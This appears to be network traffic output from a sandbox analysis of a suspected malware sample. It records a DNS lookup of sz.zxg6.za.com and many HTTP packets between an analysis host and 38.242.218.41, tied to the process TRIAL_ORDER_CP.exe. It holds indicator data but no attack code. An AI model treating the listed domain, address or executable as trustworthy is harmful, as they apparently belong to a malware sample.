Aug 28, 2024 12:25:21.460376978 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.460432053 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.460432053 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.460432053 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.460486889 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.460541010 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.460596085 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.460613012 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.460649967 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.460705996 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.460716963 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.460716963 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.460762024 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.460886955 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.460901022 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.460930109 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461025000 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461057901 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.461057901 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.461059093 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.461122990 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461188078 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461244106 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461281061 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.461298943 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461354017 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461462021 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461467028 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461463928 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.461463928 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.461463928 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.461523056 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461566925 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.461579084 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461633921 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461688042 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461741924 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461796045 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461800098 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.461800098 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.461800098 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.461850882 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461905003 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.461967945 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.462009907 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.462014914 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.462069988 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.462132931 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.462132931 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.462132931 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.462132931 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.462311029 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.462311983 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.462311983 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.647141933 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.647264957 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.647332907 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.647345066 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.647399902 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.647607088 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.647631884 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.647631884 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.647768974 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.647833109 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.647890091 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.647972107 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.647972107 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.648139954 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.648196936 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.648318052 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.648324013 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.648420095 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.648487091 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.648483992 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.648484945 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.648583889 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.648678064 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.648758888 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.648775101 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.648776054 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.648817062 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.648873091 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.648926020 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.648946047 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.648982048 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.649039030 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.649091959 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.649113894 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.649113894 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.649113894 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.649147987 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.649203062 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.649255991 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.649290085 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.649311066 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.649466991 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.649466991 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.649502039 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.649600983 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.649626017 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.649694920 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.649765968 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.649772882 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.649833918 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.649924994 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.649938107 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.649938107 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.650017977 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650110960 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.650114059 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650111914 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.650183916 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650239944 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650275946 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.650275946 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.650294065 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650348902 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650402069 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650440931 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.650440931 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.650458097 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650540113 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650608063 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650609016 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.650609016 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.650664091 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650717974 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650789022 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.650793076 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650876999 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650934935 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.650959015 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.650990963 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.651046038 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.651099920 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.651129007 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.651129007 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.651129007 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.651154041 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.651209116 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.651263952 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.651299953 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.651319027 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.651375055 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.651429892 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.651478052 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.651479006 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.651484013 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.651539087 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.651595116 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
Aug 28, 2024 12:25:21.651631117 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.651631117 CEST | 49865 | 80 | 192.168.11.20 | 38.242.218.41
Aug 28, 2024 12:25:21.651649952 CEST | 80 | 49865 | 38.242.218.41 | 192.168.11.20
                                        Aug 28, 2024 12:25:21.651705027 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651760101 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651778936 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651779890 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651813984 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651870012 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651925087 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651947021 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651947021 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.651957989 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651972055 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651985884 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.651999950 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652014017 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652028084 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652041912 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652115107 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.652115107 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.652120113 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652122974 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652122974 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652123928 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652124882 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652126074 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652136087 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652149916 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652285099 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.652285099 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.652291059 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.652453899 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.652622938 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.832353115 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832387924 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832546949 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832561970 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832576036 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832679033 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.832690001 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832705021 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832748890 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832767963 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.832782984 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.832782984 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.832840919 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832854986 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.832983017 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.833152056 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.833152056 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.833976030 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.833991051 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.834192991 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.834323883 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.837083101 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837179899 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837193012 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837244987 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.837310076 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837414980 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.837524891 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837538958 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837549925 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837560892 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837585926 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.837734938 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837749958 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837754965 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.837779999 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837791920 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837805033 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837824106 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837836027 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837846994 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837860107 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837873936 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837884903 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.837924957 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.837924957 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838011980 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838044882 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838057041 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838094950 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838160038 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838179111 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838217020 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838320971 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838326931 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838430882 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838443041 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838496923 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838530064 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838630915 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838644981 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838668108 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838668108 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838675976 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838687897 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838836908 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838838100 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.838850021 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838861942 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838872910 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838891029 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838901997 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.838996887 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839073896 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839118004 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839167118 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839215994 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839232922 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839304924 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839317083 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839328051 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839337111 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839337111 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839400053 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839507103 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839524031 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839581966 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839592934 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839605093 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839652061 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839678049 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839678049 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839678049 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839711905 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839761019 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839812994 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839848042 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.839900017 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.839952946 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840018034 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840018034 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840073109 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840101004 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840131998 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840198994 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840204000 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840217113 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840331078 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840368032 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840401888 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840538025 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840538025 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840547085 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840557098 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:21.840603113 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:21.840943098 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:26.655699015 CEST804986538.242.218.41192.168.11.20
                                        Aug 28, 2024 12:25:26.655946016 CEST4986580192.168.11.2038.242.218.41
                                        Aug 28, 2024 12:25:42.969021082 CEST4986580192.168.11.2038.242.218.41
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2024 12:25:20.602490902 CEST | 49945 | 53 | 192.168.11.20 | 1.1.1.1
Aug 28, 2024 12:25:20.709916115 CEST | 53 | 49945 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 28, 2024 12:25:20.602490902 CEST | 192.168.11.20 | 1.1.1.1 | 0xc92f | Standard query (0) | sz.zxg6.za.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 28, 2024 12:25:20.709916115 CEST | 1.1.1.1 | 192.168.11.20 | 0xc92f | No error (0) | sz.zxg6.za.com | | 38.242.218.41 | A (IP address) | IN (0x0001) | false
                                        • sz.zxg6.za.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49865 | 38.242.218.41 | 80 | 7964 | C:\Users\user\Desktop\TRIAL_ORDER_CP.exe
